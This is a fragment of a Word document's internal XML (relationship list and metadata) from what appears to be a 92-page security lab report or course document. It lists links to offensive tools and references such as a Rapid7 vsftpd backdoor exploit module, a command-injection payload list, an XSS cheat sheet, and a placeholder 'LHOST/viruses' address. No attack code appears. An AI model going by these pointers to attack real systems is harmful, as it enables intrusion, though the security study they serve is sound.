    <w:rsid w:val="00EC00CE"/>
    <w:rsid w:val="00ED1CCE"/>
    <w:rsid w:val="00ED24CC"/>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935E5"/>
    <w:rsid w:val="00FA2180"/>
    <w:rsid w:val="00FB033B"/>
    <w:rsid w:val="00FB4BB5"/>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tercap-project.org/" TargetMode="External"/><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7.png"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.jpeg"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dnsdumpster.com/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/c/H" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.jpe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101.jpeg"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fortinet.com/resources/cyberglossary/computer-virus" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image77.jpeg"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.10.2/ossec-wui"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88.jpeg"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bettercap.org/" TargetMode="External"/><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63.jpeg"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.png"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet"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mailto:student@192.168.234.2"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hyperlink" Target="https://owasp.org/www-project-top-ten/" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.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image" Target="media/image112.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3.jpeg"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89.jpeg"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.jpeg"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/coreruleset/coreruleset.git" TargetMode="Externa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3.jpeg"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image107.jpeg"/><Relationship Id="rId151"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109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.linkedin.com/" TargetMode="External"/><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5.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3.jpeg"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://doi.org/10.1145/1290958.1290968"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hyperlink" Target="https://www.linkedin.com/in/andy-jassy-8b1615?lipi=urn%3Ali%3Apage%3Ad_flagship3_profile_view_base_contact_details%3BcLibGTmNQKCFhqJYd194eA%3D%3D" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.jpeg"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.jpeg"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image108.jpeg"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.jpe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6.jpeg"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.jpeg"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securityboulevard.com/2020/03/intrusion-detection-systems-a-deep-dive-into-nids-hids/" TargetMode="External"/><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portswigger.net/web-security/cross-site-scripting/cheat-sheet" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.png"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image94.jpeg"/><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1.jpeg"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image109.jpe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hyperlink" Target="https://twitter.com/leclercqs" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/" TargetMode="External"/><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hyperlink" Target="https://www.unifiedkillchain.com/" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.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5.jpeg"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image115.jpeg"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://heimdalsecurity.com/blog/host-intrusion-detection-system-hids/"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kifarunix.com/install-ossec-hids-agent-on-ubuntu-20-04/" TargetMode="Externa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hyperlink" Target="https://archive.org/web/" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.jpeg"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.jpeg"/><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hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Command%20Injection/Intruder/command_exec.txt" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.png"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image96.jpeg"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://LHOST/viruses" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7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92</Pages>
  <Words>9682</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42</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-09-06T14:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-10-02T23:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>